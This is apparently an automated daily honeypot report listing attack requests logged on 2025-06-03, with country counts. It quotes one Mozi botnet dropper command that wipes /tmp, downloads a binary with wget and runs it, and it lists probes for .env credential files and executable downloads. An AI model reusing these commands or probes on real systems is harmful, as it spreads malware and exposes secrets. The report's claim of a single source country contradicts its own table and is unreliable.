Daily Report: 2025-06-03#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 89 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1520 requests were recorded during the day, originating from 1 different countries, with a peak of 643 requests coming from JP.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
120.86.253.229 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
128 | 2 | GET /core/.env.prod HTTP/1.1 |
139 | 2 | GET /sources/.env.production HTTP/1.1 |
140 | 2 | GET /sources/.env.prod HTTP/1.1 |
153 | 2 | GET /test.dat HTTP/1.1 |
159 | 1 | GET /45.txt HTTP/1.1 |
186 | 1 | 64\x00 |
187 | 1 | \x87\x00\x00\x00IIMBTIJIBN\x08\x03\x00\x00{\x99Caig\x9C\x03\xC7U\x0E\x19\xB1\xDE\x9E\x84\x89\x8Bh\x97\x04FE\x8F\x01\x95\x09\xF2k\xFA oyv\x09\xF6 |
188 | 1 | GET /cmdoutput HTTP/1.1 |
191 | 1 | GET /wh/glass.php HTTP/1.1 |
192 | 1 | POST /nvidia_license_upd.php HTTP/1.1 |
193 | 1 | GET /download/1.txt HTTP/1.1 |
194 | 1 | \xC5\xB5 |
196 | 1 | GET /beacons/ HTTP/1.1 |
200 | 1 | GET /upaid.exe HTTP/1.1 |
201 | 1 | \x00\x00\x00\x15\x00\x00\x00\x02AA |
202 | 1 | `\x00\x00\x00 |
203 | 1 | \x00\x0E8Z\x9A}b]\x82\xC6\x9A\x00\x00\x00\x00\x00 |
205 | 1 | \x00\x00\x00 |
220 | 1 | GET /login?next=. HTTP/1.1 |
221 | 1 | GET /font/main-webfont.woff2 HTTP/1.1 |
227 | 1 | \xFF\xA2\xFF\x00\xFF=\xFF\xAD\xFF\x00\xFF\xD1\xFF\xD8\xF1\xAD\xFF\xBEH\xFB_5\xFF\xAD\xF1 |
230 | 1 | GET /BoPai.xq HTTP/1.1 |
240 | 1 | GET /extensions/a586bc8a-728c-4d06-8180-befb9e20c408 HTTP/1.1 |
248 | 1 | POST /ymybisvimqjoknhmgryit/getocmskdmsm/ HTTP/1.1 |
249 | 1 | GET /c2 HTTP/1.1 |
254 | 1 | GET /DBds HTTP/1.1 |
256 | 1 | GET /api/getit HTTP/1.1 |
270 | 1 | GET /s?ie=utf-8&tn=baidu&rsv_pq=vepmbtt4yo7dk172&rqlang=cn&rsv_t= HTTP/1.1 |
271 | 1 | POST /session HTTP/1.1 |
300 | 1 | GET /test.jpg HTTP/1.1 |
313 | 1 | \x96\x00\x00\x00\x99\x01\x00\x00\x8E\x00\x00\x00x\x9Ccd \x00\x5C\x5C\x83\xBDC\xFC\x03t\xC3L\x8D\xFD\xBC\xDDBKR\x8BK\x18\x10\x5C\xB0\x12. f\x04\xE2\x09\xFFe\x0Cf\x9F\xBC\x01b2x2\xE41\x940\xA42\xE40h0\x041h2(0X0\x181\x982\x983\x980\xF8\x00y\xEE\x0C\x99\x0C\xE9\x0C\x89\x0CI@\xBA\x04\xC8\xF7\x03\xAA-a(g\xC8g(b\xC8\x06\xF2\x9D\x81\xAC< LeH\x06\x8Ag\x82y$\x01\x1EM\x81\xABE\x0C\x0C\x07V\x1Ck@\x97b$\xCD\xA4\x81\x01\x00\x04\xF2\x1F= |
321 | 1 | \x22\x00\x00\x00 |
338 | 1 | \x00\x0E8K\x22\x8D{\xEA\x1E\x11\xAF\x00\x00\x00\x00\x00 |
359 | 1 | GET /OdinHttpCall1748970201 HTTP/1.1 |
361 | 1 | GET /odinhttpcall1748970201 HTTP/1.1 |
369 | 1 | GET /Odin/http/call1748970201 HTTP/1.1 |
377 | 1 | \x00\x0E8P\xB7\xE8\xE5\x10\x8FI~\x00\x00\x00\x00\x00 |
413 | 1 | POST /kpi HTTP/1.1 |
428 | 1 | GET /fsxlxhxzaf.png HTTP/1.1 |
446 | 1 | ABCDEFGHVCMD\x00\x00 |
451 | 1 | GET /1.txt HTTP/1.1 |
455 | 1 | GET /center/user_sid HTTP/1.1 |
456 | 1 | POST /nation.php HTTP/1.1 |
462 | 1 | GET /ui/authentication HTTP/1.1 |
472 | 1 | \x00censys\x00censysio\x00vt100/9600\x00 |
489 | 1 | GET /jquery/2.0.1/jquery.min.js HTTP/1.1 |
498 | 1 | asdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasd |
507 | 1 | 32\x00 |
516 | 1 | GET /1.dll HTTP/1.1 |
532 | 1 | GET /jquery.js HTTP/1.1 |
533 | 1 | \x00\x00\x00\xC0\xFESMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02\x22\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x0E\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
541 | 1 | GET /2jjd7VgJVdKDI4Ih4eB63gTcZqdcCuq-35nmN8xhwTM8_uHq3BUqs9Zb_nf_C7AzNzvltmRoSf6-WRNz- HTTP/1.1 |
542 | 1 | GET /1.exe HTTP/1.1 |
543 | 1 | GET /9lqF HTTP/1.1 |
546 | 1 | POST /QKBFJBVZsPKeqFS/HAchGeCttVyEtqZ.php HTTP/1.1 |
547 | 1 | GET /s1/index.htm HTTP/1.1 |
551 | 1 | GET /Qi7wAH39 HTTP/1.1 |
552 | 1 | GET /MYMj HTTP/1.1 |
558 | 1 | \x10\x00\x00\x00\x02\xB1\xD7\x02\x00\x00\x00\x00\xCA\x00<9 |
567 | 1 | \x9F\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x80\x00\x08\x00\x00\x00\xD3\xC3\xBB\xA7\xBD\xF8\xC8\xEB\x04\x00\x00\x80\x00\x1D\x00\x00\x00DESKTOP-9YRLE7 |
585 | 1 | \x11\x00\x00\x00\x01\x00\x00\x00n\x00\xE4!\xC1~/#u |
653 | 1 | \x00\x0E8\x89\x15\x1AR \xEC,\x14\x00\x00\x00\x00\x00 |
673 | 1 | \x00\x0E8\xEA?x\xD1\x1A\xD4\x09\xE6\x00\x00\x00\x00\x00 |
679 | 1 | GET /wiki HTTP/1.1 |
682 | 1 | GET /common2/out/1 HTTP/1.1 |
683 | 1 | GET /Dem7kTu/Login.php HTTP/1.1 |
685 | 1 | GET /llq.rar HTTP/1.1 |
689 | 1 | GET /kY8a HTTP/1.1 |
714 | 1 | GET /tat HTTP/1.1 |
716 | 1 | GET /common2/out/2 HTTP/1.1 |
721 | 1 | GET /manjusaka/static/ HTTP/1.1 |
726 | 1 | GET /fssdcsrweqww.ini HTTP/1.1 |
727 | 1 | GET /b.gif HTTP/1.1 |
746 | 1 | GET /search/s.php?i=1&id=APOX8NWOV42320 HTTP/1.1 |
750 | 1 | GET /trx38.zip HTTP/1.1 |
770 | 1 | GET /JYNl HTTP/1.1 |
777 | 1 | TQ8zyt9Dz3 |
778 | 1 | \x9E\x00\x00\x00IIMBTIJIBN\x08\x03\x00\x00{\x99Caig\x9C\x03\xC7eB\xC5\x09\xC1\x18\x11\x1A\x91\x87ppiX[os\xAFAEjp\xBF\x85%\x03\xDE\x08!\x91aa\xD3\xE2\x88\xBA\x07\x04R\x1C\xD8\xA5]\x5C\x83\xBDC\xFC\x03t\x83\x82=}\x5C\xC2\x22\xE8\xEF\xB0A\x02\x0CY\x18\x18\xFE\xF330\xCC\xFC\xCFH\x86n\xA33o\x8C\x0CNm44\xDF~\x8D,\xDB\xCF\xDDS Q\x87_iN\x0EYV\x91\x00 !add\xA2k \xAEkl\xA0`hbehJ\x8C^\x00\xCEi\x1B! |
781 | 1 | GET /1.jpg HTTP/1.1 |
790 | 1 | GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1 |
793 | 1 | GetRemoteShellCode_52\x00 |
794 | 1 | GET /202312082118335862cd360.bmp HTTP/1.1 |
805 | 1 | GET /Tan.jpg HTTP/1.1 |
817 | 1 | GET /test7.jpg HTTP/1.1 |
818 | 1 | GET /mine/random.exe HTTP/1.1 |
833 | 1 | GET /MSyD HTTP/1.1 |
844 | 1 | GET /test6.jpg HTTP/1.1 |
849 | 1 | POST /api/attach HTTP/1.1 |
862 | 1 | GET /zMLUH93A HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 643 | JP |
1 | 192 | US |
2 | 96 | DE |
3 | 92 | BG |
4 | 87 | GB |
5 | 63 | IN |
6 | 54 | CN |
7 | 52 | NL |
8 | 48 | HK |
9 | 35 | SC |
10 | 26 | CA |
11 | 24 | PL |
12 | 13 | CH |
13 | 12 | GH |
14 | 9 | AO |
15 | 8 | NG |
16 | 6 | PT |
17 | 6 | VN |
18 | 5 | ZA |
19 | 5 | TR |
20 | 4 | IL |
21 | 4 | ID |
22 | 3 | AZ |
23 | 3 | BE |
24 | 3 | SG |
25 | 3 | IR |
26 | 3 | KZ |
27 | 3 | TH |
28 | 2 | MD |
29 | 2 | KW |
30 | 2 | UA |
31 | 2 | RU |
32 | 2 | IE |
33 | 1 | CZ |
34 | 1 | BR |
35 | 1 | PA |
36 | 1 | TW |
37 | 1 | DZ |
38 | 1 | ES |
39 | 1 | KR |
40 | 1 | SE |